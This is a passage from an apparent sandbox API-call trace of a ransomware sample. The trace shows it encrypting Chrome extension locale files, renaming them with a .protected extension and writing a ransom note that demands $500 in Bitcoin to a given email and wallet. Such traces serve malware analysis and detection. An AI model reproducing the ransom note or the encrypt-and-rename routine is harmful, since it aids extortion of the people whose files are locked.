Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.550] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json") returned 155 [0080.550] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.550] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json") returned 155 [0080.550] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.550] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json") returned 155 [0080.550] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.550] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x16a, lpOverlapped=0x0) returned 1 [0080.550] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffe96, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.551] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x16a, lpOverlapped=0x0) returned 1 [0080.551] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.551] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.551] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.551] CloseHandle (hObject=0x168) returned 1 [0080.551] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.protected") returned 165 [0080.551] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.protected")) returned 1 [0080.552] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.552] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.552] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\RESTORE_FILES.txt") returned 159 [0080.552] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.552] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.552] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.553] lstrlenA (lpString="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") returned 684 [0080.553] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.553] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.553] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.553] CloseHandle (hObject=0x164) returned 1 [0080.553] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.553] lstrcmpiW (lpString1="ja", lpString2="Windows") returned -1 [0080.553] lstrcmpiW (lpString1="ja", lpString2="Program Files") returned -1 [0080.553] lstrcmpiW (lpString1="ja", lpString2="Program Files (x86)") returned -1 [0080.553] lstrcmpiW (lpString1="ja", lpString2="$Recycle.bin") returned 1 [0080.553] lstrcmpiW (lpString1="ja", lpString2="System Volume Information") returned -1 [0080.553] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja") returned 141 [0080.553] lstrcmpW (lpString1="ja", lpString2=".") returned 1 [0080.553] lstrcmpW (lpString1="ja", lpString2="..") returned 1 [0080.553] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\*") returned 143 [0080.553] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.554] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.554] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.554] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.554] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.554] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.554] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\.") returned 143 [0080.554] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.554] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.554] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.554] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.554] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.554] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.554] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.554] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\..") returned 144 [0080.554] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.554] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.554] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.554] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.554] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.554] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.554] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.554] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.554] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json") 
returned 155 [0080.554] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.554] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.554] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.554] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.555] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json") returned 155 [0080.555] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.555] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json") returned 155 [0080.555] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.555] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json") returned 155 [0080.555] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.555] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xfb, lpOverlapped=0x0) returned 1 [0080.556] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff05, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.556] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xfb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xfb, lpOverlapped=0x0) returned 1 [0080.556] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.556] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.556] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.556] CloseHandle (hObject=0x168) returned 1 [0080.556] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.protected") returned 165 [0080.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.protected")) returned 1 [0080.557] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.557] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.557] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\RESTORE_FILES.txt") returned 159 [0080.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.557] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.557] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.558] lstrlenA (lpString="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") returned 684 [0080.558] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.558] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.558] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.558] CloseHandle (hObject=0x164) returned 1 [0080.559] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.559] lstrcmpiW (lpString1="ka", lpString2="Windows") returned -1 [0080.559] lstrcmpiW (lpString1="ka", lpString2="Program Files") returned -1 [0080.559] lstrcmpiW (lpString1="ka", lpString2="Program Files (x86)") returned -1 [0080.559] lstrcmpiW (lpString1="ka", lpString2="$Recycle.bin") returned 1 [0080.559] lstrcmpiW (lpString1="ka", lpString2="System Volume Information") returned -1 [0080.559] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka") returned 141 [0080.559] lstrcmpW (lpString1="ka", lpString2=".") returned 1 [0080.559] lstrcmpW (lpString1="ka", lpString2="..") returned 1 [0080.559] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\*") returned 143 [0080.559] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.559] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.559] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.559] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.560] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.560] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.560] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\.") returned 143 [0080.560] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.560] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.560] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.560] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.560] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.560] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.560] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.560] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\..") returned 144 [0080.560] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.560] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.560] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.560] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.560] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.560] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.560] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.560] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.560] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json") 
returned 155 [0080.560] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.560] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.560] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.560] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.560] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json") returned 155 [0080.560] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.560] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json") returned 155 [0080.560] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.560] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json") returned 155 [0080.560] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.561] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
